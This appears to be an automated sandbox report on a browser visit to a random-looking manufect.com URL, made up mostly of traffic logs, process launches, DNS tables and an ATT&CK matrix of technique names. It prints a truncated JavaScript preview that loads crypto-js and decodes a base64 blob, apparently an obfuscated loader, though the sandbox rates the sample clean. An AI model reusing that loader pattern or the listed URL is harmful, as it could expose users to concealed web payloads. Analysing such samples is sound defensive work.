Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: classification engineClassification label: clean0.win@16/2@6/5
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2020,i,9436422360427185457,16463863993275547798,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2020,i,9436422360427185457,16463863993275547798,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    unknown
    t3sp2vzrhieujyp67175b9328f1f.manufect.com
    104.21.3.186
    truefalse
      unknown
      s-part-0017.t-0009.fb-t-msedge.net
      13.107.253.45
      truefalse
        unknown
        www.google.com
        142.250.185.68
        truefalse
          unknown
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://a.nel.cloudflare.com/report/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3Dfalse
              unknown
              https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/favicon.icofalse
                unknown
                https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpackfalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jschromecache_42.2.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.68
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  104.21.3.186
                  t3sp2vzrhieujyp67175b9328f1f.manufect.comUnited States
                  13335CLOUDFLARENETUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.4
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1539803
                  Start date and time:2024-10-23 06:46:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 13s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:browseurl.jbs
                  Sample URL:https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:CLEAN
                  Classification:clean0.win@16/2@6/5
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.78, 142.251.168.84, 34.104.35.123, 88.221.110.91, 192.229.221.95, 142.250.185.131
                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2180), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):2957
                  Entropy (8bit):5.599427400940596
                  Encrypted:false
                  SSDEEP:48:s7VV6bzgWcp+osj7RzpTboVS/T8K2x+LobaTcwsHhQQtPeFefMO98t2V:spV6bz7Nj7QE/T8r+zcwYhQQtmFefMOV
                  MD5:8F75DE5A820339B8C6BC7E19FA074D13
                  SHA1:26B9214BA3DB00AAD6D537EA0711DC0721BC384B
                  SHA-256:9746FEBFCBBD21D2C959A5CA401E8CB377E80E3D616FC739CCF53EBCC065F76E
                  SHA-512:8ECE39DC2D216165148492CB952289ED9DC68923A9A0AD646BAAFDBCC2A9B4B0CE0A6E6F85CAE1AF52DF9DF63C72576B284C2A98F87E627D5E842EC927544276
                  Malicious:false
                  Reputation:low
                  URL:https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack
                  Preview: var sKnIIMS = document.createElement("script");.. sKnIIMS.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");.. document.head.append(sKnIIMS);.. sKnIIMS.onload = function() {.. var jsonData = JSON.parse(atob("eyJhIjoiZWNkZDkzMDFiYWFmNGZlM2RhMzY2NTJmNTRjMWVjNTNjNWNhYmRiNzYyMzMzZjBmMmYzNmU1MjY1ZTNhNzBkZTM4MDcwOGJmZDUzYWUwNjRhZGIwYjliNzFmMjRhNzkxZGQ0NDJlMzI3NzhhODU2NDFjOTM2ZTA0Mjg5ODk1ZDk3NWQxN2EwYmEwN2VmMmZhODA0ZWY2YzE1N2E3MWFlNzg2YjE1YmU1Yjc0ZDdkODU4MWNjYmQwNGVkMTIwODQ0OWMwMjczYTJjMzllMGJjNzc0NDZlZGM0MDU2ZWZkZDgzMzhkMjIwNzExNjFlNTA3YmY2YWVjYjRkNWY2ZjI5NDFhNzZmZGM0ZDRkMWQyMDdmNmNmZmY2MzkxZmM0NmU3NjU2NWE0ZDZmZjIxZGYyNzQ3MTAxOGRmNmYzZDY2NTU2MzJkZmQzYmQ3MzQzNGE3YzhlYmM0ODllMGVmOGU5M2UxYWRlMzc1ZjU4NjVhZTI5NjI5NGQ3NjZhODdlZGQ5YzMyMzA3ZThlNDhhZDk0MjQwMDhkZWM1OGZiMzVmMTYwNjZjNjQwZDEyMzNmMTQ1YWY0M2I1MzNlZTdiODkwOTZjOGRmNmUwODZlMWE2MzhhNWMzNjQyOWI0Yjk1ODY4MzZlNDM0YTU0ZTlhZDBiNDE1ZGUzZWE3MWU4NzM1NDNlODlmNmY3ZDEyYmM4
                  No static file info
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 23, 2024 06:47:03.159445047 CEST49675443192.168.2.4173.222.162.32
                  Oct 23, 2024 06:47:05.446466923 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.446573973 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:05.446671009 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.446743011 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.446788073 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:05.446846962 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.447017908 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.447052956 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:05.447377920 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:05.447397947 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.072716951 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.073286057 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.073283911 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.073345900 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.073561907 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.073577881 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.074987888 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.075088024 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.075191021 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.075265884 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.082901955 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.082943916 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.082999945 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083007097 CEST44349736104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.083086967 CEST49736443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083306074 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083345890 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.083435059 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083508968 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083508968 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083539963 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083601952 CEST44349737104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.083709955 CEST49737443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083827019 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083880901 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.083956003 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.083996058 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.084011078 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:06.084083080 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:06.084105015 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.282808065 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.283144951 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.283159018 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.284055948 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.284306049 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.285041094 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.285099983 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.285346031 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.285356045 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.287398100 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.287647963 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.287678957 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.289321899 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.289388895 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.290250063 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.290344000 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.333050966 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.333101988 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.333111048 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.380047083 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.645673990 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.645705938 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.645725012 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.645771980 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.645792007 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.645822048 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.645865917 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.645865917 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.647352934 CEST49739443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.647370100 CEST44349739104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.694389105 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:07.735368967 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:07.792467117 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:07.792500973 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:07.792577028 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:07.792814016 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:07.792829990 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:08.061585903 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:08.061830997 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:08.062328100 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:08.063672066 CEST49740443192.168.2.4104.21.3.186
                  Oct 23, 2024 06:47:08.063714981 CEST44349740104.21.3.186192.168.2.4
                  Oct 23, 2024 06:47:08.071377039 CEST49743443192.168.2.435.190.80.1
                  Oct 23, 2024 06:47:08.071433067 CEST4434974335.190.80.1192.168.2.4
                  Oct 23, 2024 06:47:08.071525097 CEST49743443192.168.2.435.190.80.1
                  Oct 23, 2024 06:47:08.071692944 CEST49743443192.168.2.435.190.80.1
                  Oct 23, 2024 06:47:08.071726084 CEST4434974335.190.80.1192.168.2.4
                  Oct 23, 2024 06:47:08.400939941 CEST49744443192.168.2.4184.28.90.27
                  Oct 23, 2024 06:47:08.401000023 CEST44349744184.28.90.27192.168.2.4
                  Oct 23, 2024 06:47:08.401077986 CEST49744443192.168.2.4184.28.90.27
                  Oct 23, 2024 06:47:08.402513981 CEST49744443192.168.2.4184.28.90.27
                  Oct 23, 2024 06:47:08.402544975 CEST44349744184.28.90.27192.168.2.4
                  Oct 23, 2024 06:47:08.652654886 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:08.652900934 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:08.652918100 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:08.654090881 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:08.654153109 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:08.655241013 CEST49742443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:47:08.655399084 CEST44349742142.250.185.68192.168.2.4
                  Oct 23, 2024 06:47:08.691972971 CEST4434974335.190.80.1192.168.2.4
